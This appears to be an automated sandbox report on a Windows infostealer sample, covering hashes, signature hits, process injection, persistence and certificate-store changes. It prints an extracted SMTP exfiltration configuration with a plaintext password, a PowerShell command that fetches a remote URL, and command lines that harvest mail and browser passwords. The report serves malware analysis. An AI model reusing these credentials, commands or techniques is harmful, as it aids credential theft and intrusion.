Analysis
max time kernel: 151s
max time network: 152s
platform: windows7_x64
resource: win7-20220718-en
resource tags: arch:x64, arch:x86, image:win7-20220718-en, locale:en-us, os:windows7-x64, system
submitted: 24-07-2022 01:43
Static task: static1
Behavioral task: behavioral1
  Sample: 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
  Resource: win7-20220718-en
Behavioral task: behavioral2
  Sample: 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
  Resource: win10v2004-20220721-en
General
Target: 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
Size: 912KB
MD5: 598843804e5c6c64eba09b9cd08bfd9d
SHA1: 213f93a0b4c73e5b8368e375dd0e89b053f9bcf5
SHA256: 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f
SHA512: 0538d5c57ed42976b037bcfad36e42fe13b3aa98a57b7dd0b32006b0d589a72c48fc05daba12a11358a42dd86d9ceccca22b38e9bcad9c0a728c72a303e68046
Malware Config
Extracted
Protocol: smtp
Host: smtp.vivaldi.net
Port: 587
Username: [email protected]
Password: nAMkXP8FUGvSc3wjPCKF
Signatures

NirSoft MailPassView (5 IoCs)
Password recovery tool for various email clients
resource / yara_rule:
- behavioral1/memory/1352-79-0x0000000000400000-0x000000000041B000-memory.dmp: MailPassView
- behavioral1/memory/1352-80-0x0000000000411654-mapping.dmp: MailPassView
- behavioral1/memory/1352-83-0x0000000000400000-0x000000000041B000-memory.dmp: MailPassView
- behavioral1/memory/1352-85-0x0000000000400000-0x000000000041B000-memory.dmp: MailPassView
- behavioral1/memory/1352-86-0x0000000000400000-0x000000000041B000-memory.dmp: MailPassView

NirSoft WebBrowserPassView (5 IoCs)
Password recovery tool for various web browsers
resource / yara_rule:
- behavioral1/memory/1632-88-0x0000000000442628-mapping.dmp: WebBrowserPassView
- behavioral1/memory/1632-87-0x0000000000400000-0x0000000000458000-memory.dmp: WebBrowserPassView
- behavioral1/memory/1632-91-0x0000000000400000-0x0000000000458000-memory.dmp: WebBrowserPassView
- behavioral1/memory/1632-92-0x0000000000400000-0x0000000000458000-memory.dmp: WebBrowserPassView
- behavioral1/memory/1632-94-0x0000000000400000-0x0000000000458000-memory.dmp: WebBrowserPassView

Nirsoft (10 IoCs)
resource / yara_rule:
- behavioral1/memory/1352-79-0x0000000000400000-0x000000000041B000-memory.dmp: Nirsoft
- behavioral1/memory/1352-80-0x0000000000411654-mapping.dmp: Nirsoft
- behavioral1/memory/1352-83-0x0000000000400000-0x000000000041B000-memory.dmp: Nirsoft
- behavioral1/memory/1352-85-0x0000000000400000-0x000000000041B000-memory.dmp: Nirsoft
- behavioral1/memory/1352-86-0x0000000000400000-0x000000000041B000-memory.dmp: Nirsoft
- behavioral1/memory/1632-88-0x0000000000442628-mapping.dmp: Nirsoft
- behavioral1/memory/1632-87-0x0000000000400000-0x0000000000458000-memory.dmp: Nirsoft
- behavioral1/memory/1632-91-0x0000000000400000-0x0000000000458000-memory.dmp: Nirsoft
- behavioral1/memory/1632-92-0x0000000000400000-0x0000000000458000-memory.dmp: Nirsoft
- behavioral1/memory/1632-94-0x0000000000400000-0x0000000000458000-memory.dmp: Nirsoft
Executes dropped EXE (2 IoCs)
pid / Process:
- 1356 Chrome.exe
- 2000 Windows Update.exe

Loads dropped DLL (2 IoCs)
pid / Process:
- 1684 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
- 1356 Chrome.exe

Uses the VBS compiler for execution (1 TTPs)
Accesses Microsoft Outlook accounts (1 TTPs, 1 IoCs)
description / ioc / Process:
- Key opened: \REGISTRY\USER\S-1-5-21-4084403625-2215941253-1760665084-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts (vbc.exe)

Adds Run key to start application (2 TTPs, 1 IoCs)
description / ioc / Process:
- Set value (str): \REGISTRY\USER\S-1-5-21-4084403625-2215941253-1760665084-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" (Windows Update.exe)

Looks up external IP address via web service (3 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow / ioc:
- 3 whatismyipaddress.com
- 5 whatismyipaddress.com
- 6 whatismyipaddress.com

Suspicious use of SetThreadContext (2 IoCs)
description / pid / Process / procid_target:
- PID 2000 set thread context of 1352 (Windows Update.exe, target 33)
- PID 2000 set thread context of 1632 (Windows Update.exe, target 34)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies system certificate store
description / ioc / Process:
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob data omitted] (Windows Update.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 (Windows Update.exe)
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [blob data omitted] (Windows Update.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 (Windows Update.exe)
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob data omitted] (Windows Update.exe)
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob data omitted] (Windows Update.exe)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid / Process:
- 1008 powershell.exe
- 2000 Windows Update.exe (63 entries)
Suspicious use of AdjustPrivilegeToken (3 IoCs)
description / pid / Process:
- Token: SeDebugPrivilege, 1356 Chrome.exe
- Token: SeDebugPrivilege, 1008 powershell.exe
- Token: SeDebugPrivilege, 2000 Windows Update.exe
Suspicious use of WriteProcessMemory (39 IoCs)
description / pid / Process / procid_target:
- PID 1684 wrote to memory of 1356 (5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe, target 27), 4 entries
- PID 1684 wrote to memory of 1456 (5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe, target 28), 4 entries
- PID 1456 wrote to memory of 1008 (WScript.exe, target 30), 4 entries
- PID 1356 wrote to memory of 2000 (Chrome.exe, target 32), 7 entries
- PID 2000 wrote to memory of 1352 (Windows Update.exe, target 33), 10 entries
- PID 2000 wrote to memory of 1632 (Windows Update.exe, target 34), 10 entries
Processes
1. C:\Users\Admin\AppData\Local\Temp\5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe"
   PID: 1684
   - Loads dropped DLL
   - Suspicious use of WriteProcessMemory
   2. C:\Users\Admin\AppData\Local\Temp\Chrome.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Chrome.exe"
      PID: 1356
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Users\Admin\AppData\Roaming\Windows Update.exe
         Command line: "C:\Users\Admin\AppData\Roaming\Windows Update.exe"
         PID: 2000
         - Executes dropped EXE
         - Adds Run key to start application
         - Suspicious use of SetThreadContext
         - Modifies system certificate store
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
            Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
            PID: 1352
            - Accesses Microsoft Outlook accounts
         4. C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
            Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
            PID: 1632
   2. C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\s7.vbs"
      PID: 1456
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -command "iwr -uri https://2no.co/2Appw5"
         PID: 1008
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 640KB
  MD5: ceb41183c47cfdfc02f2f823f59345a4
  SHA1: a8ce2f8b8912e5d59653af4e426e8ddd92823e1e
  SHA256: 338b52b52f0352a2c543b60ead3e80767bd32d44fc5dee050fef4a703ce58fc0
  SHA512: 6ce3b9e1712023cdacb1b23f15ed9ff634c93c95b7d05f4c86e38cd06db8aa7b818f49e607ddbe11bb588af9b996f9daa7b7f2cb31b67ab6067429d95c6efbed
- Filesize: 44B
  MD5: 9adcd38d352368d85ae6dc22cd2393ec
  SHA1: 608f7f4ddd5547b537b1a3075a12a11ff03bdd82
  SHA256: 2fa2cf15eacef5258245ba5f331cfd8286547cca36babb479e46deb0b9000408
  SHA512: b3eab8af2d965a158abcf385c4ff386ff170214779ba29976e21f2044f0fc2ee16766e4496cd0ffe21fed789aaad91e0ff27ff0fad16bd51e5b19b1332508d28
- Filesize: 2B
  MD5: f3b25701fe362ec84616a93a45ce9998
  SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
  SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
  SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
- Filesize: 29KB
  MD5: 46ea1b5552e77fbc7679f93124754c57
  SHA1: 39cbbdba52ccacd8f874c7afac32b712c2e5bff9
  SHA256: 54a60ce0810b7b0d3e2ab1a9f9f51752d7573a694ec7c1c252a907fb3117bca5
  SHA512: ac9f19f3314ec3f1c71d4e4681de52102d33110ed4f662b3e2c2a4577f66581d3ba43577ad5ff4ba557145afbf97aa4daec825f57bc9cfda4efd335530d6cb70